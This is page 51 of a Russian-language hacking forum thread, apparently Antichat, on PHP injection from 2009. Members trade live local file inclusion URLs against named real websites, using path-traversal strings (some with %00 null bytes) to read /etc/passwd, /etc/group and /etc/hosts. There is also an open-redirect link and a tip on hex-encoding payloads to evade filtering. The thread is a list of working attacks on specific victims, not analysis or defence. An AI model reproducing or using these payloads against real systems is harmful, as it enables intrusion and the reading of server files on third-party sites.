PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

Page 51 of 72
  1. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    LFI
    Кто то уже постил инклюд на этом сайте, но в другом месте, на который уже нету ссылок на главной :)
     
    #1001 Ctacok, 29 Oct 2009
  2. keng

    keng Member

    Joined:
    9 Apr 2008
    Messages:
    60
    Likes Received:
    43
    Reputations:
    8
    Code:
    http://www.media1ads.com/index.php?page=../../../../etc/passwd
    Code:
    http://www.olarkin.com/main/dev/index.php?page=../../../../../../etc/passwd
     
    #1002 keng, 31 Oct 2009
    Last edited by a moderator: 31 Oct 2009
    2 people like this.
  3. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Ошибки из-за того что уже в kro_full.php уже обьявленно mysql_select_db() и mysql_query().

    И опять, ошибка из-за того что уже обьявленна функция.
     
    #1003 Ctacok, 2 Nov 2009
    Last edited: 2 Nov 2009
    2 people like this.
  4. hackmon

    hackmon Member

    Joined:
    16 Sep 2009
    Messages:
    58
    Likes Received:
    40
    Reputations:
    2
    http://dl-stem.kiev.ua/index.php?id=main&page=../index
     
    #1004 hackmon, 4 Nov 2009
  5. cl1

    cl1 New Member

    Joined:
    2 Nov 2009
    Messages:
    2
    Likes Received:
    1
    Reputations:
    3
    Code:
    http://www.tolkynzabirova.kz/press/index.php?file=../../../../../../../../../../../../../etc/passwd
     
    #1005 cl1, 5 Nov 2009
    1 person likes this.
  6. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    http://www.astrocentr.ru/index.php?przd=drjd&id=./index
     
    #1006 Bramin, 6 Nov 2009
    2 people like this.
  7. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    Code:
    http://www.expert-line.com/static.php?file=../../../../../../../../etc/passwd

http://www.expert-line.com/static.php?file=../../../../../../../../etc/group
     
    #1007 547, 6 Nov 2009
    2 people like this.
  8. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    http://www.siemens-ha.com.cn/download.php?url=../../../../etc/passwd%00

    http://www.blaineywellness.com/index.php?file=../../../../../../../../etc/passwd%00
     
    #1008 nikp, 7 Nov 2009
  9. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    http://www.truthaboutevolution.net/index.php?page=../../../../etc/passwd
    ==============================
    http://www.plagron.fr/index.php?page=../../../../etc/hosts
     
    #1009 Bb0y, 8 Nov 2009
    Last edited: 8 Nov 2009
    2 people like this.
  10. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    Проявляю активность! =)
     
    #1010 Twoster, 9 Nov 2009
    2 people like this.
  11. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    http://datinginukraine.com/privacy.php?language_id=../../../../../../etc/passwd%00

    http://www.simchaonline.com/privacy.php?language_id=../../../../../../etc/passwd%00
     
    #1011 [x60]unu, 9 Nov 2009
  12. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    http://yungdarius.comli.com/page.php?url=http://google.com
     
    #1012 547, 9 Nov 2009
    1 person likes this.
  13. nikp

    nikp Banned

    Joined:
    19 Sep 2008
    Messages:
    328
    Likes Received:
    591
    Reputations:
    764
    http://www.cis-promotion.com/index.php?file=../../../../../../../../../etc/passwd

    http://qgotchi.sourceforge.net/index.php?page=../../../../../../../../etc/passwd%00
     
    #1013 nikp, 9 Nov 2009
    1 person likes this.
  14. gromoza

    gromoza Member

    Joined:
    21 Dec 2008
    Messages:
    7
    Likes Received:
    6
    Reputations:
    0
    http://vsmarts.com/iSupport/index.php?

    include_file=../../../../../../../../../../../../../../../../../../../../../etc/passwd
     
    #1014 gromoza, 9 Nov 2009
    Last edited: 9 Nov 2009
  15. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    данные фильтруються потому и HEX вид.
    Можно инклудить, здесь /../../../../../../etc/passwd
    переводить, например, через http://www.yellowpipe.com/yis/tools/encrypter/index.php
     
    #1015 Strilo4ka, 10 Nov 2009
  16. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    1. Это не PHP, а SQL - инъекция.
    2. Это чтение файла через SQL-Инъекцию, а не инклюд.
    3. Данные не фильтруются, а слешируются.
     
    #1016 mailbrush, 10 Nov 2009
  17. [underwater]

    [underwater] Member

    Joined:
    29 Mar 2009
    Messages:
    78
    Likes Received:
    92
    Reputations:
    27
    Code:
    http://burg-pension.de/index.php?page=../../../../../../../../../../etc/passwd
    Code:
    http://www.funnelwebcentral.org/articles.php?action=article&article=../../../../../etc/passwd
    Code:
    http://www.tonie.net/index.php?p=../../../../../../../etc/passwd
    Code:
    http://www.colombopage.com/cgi-bin/show_ach.cgi?../../../../../../../../../../../etc/passwd
    Code:
    http://www.argad.org/cgi-bin/sito.cgi?file=../../../../../../../etc/passwd
     
    #1017 [underwater], 10 Nov 2009
    1 person likes this.
  18. 2pick

    2pick Elder - Старейшина

    Joined:
    17 Mar 2007
    Messages:
    117
    Likes Received:
    39
    Reputations:
    2
    http://www.moderntalking.pl/arts/index.php?strona=/etc/passwd
    Форум есть... ток phpbb аватарки не проинклудить :(
     
    #1018 2pick, 10 Nov 2009
  19. Aртем

    Aртем Member

    Joined:
    18 Oct 2009
    Messages:
    53
    Likes Received:
    31
    Reputations:
    5
    http://www.klm-mra.be/klm-new/engels/main01.php?id=menu_links/../../../../../../../../../../../../../../../../../etc/passwd%00
     
    #1019 Aртем, 11 Nov 2009
    2 people like this.
  20. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    http://www.iusspavia.it/news.php?id=451&menu=../../../etc/passwd
     
    #1020 Bb0y, 11 Nov 2009
    1 person likes this.
(You must log in or sign up to post here.)
Page 51 of 72
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.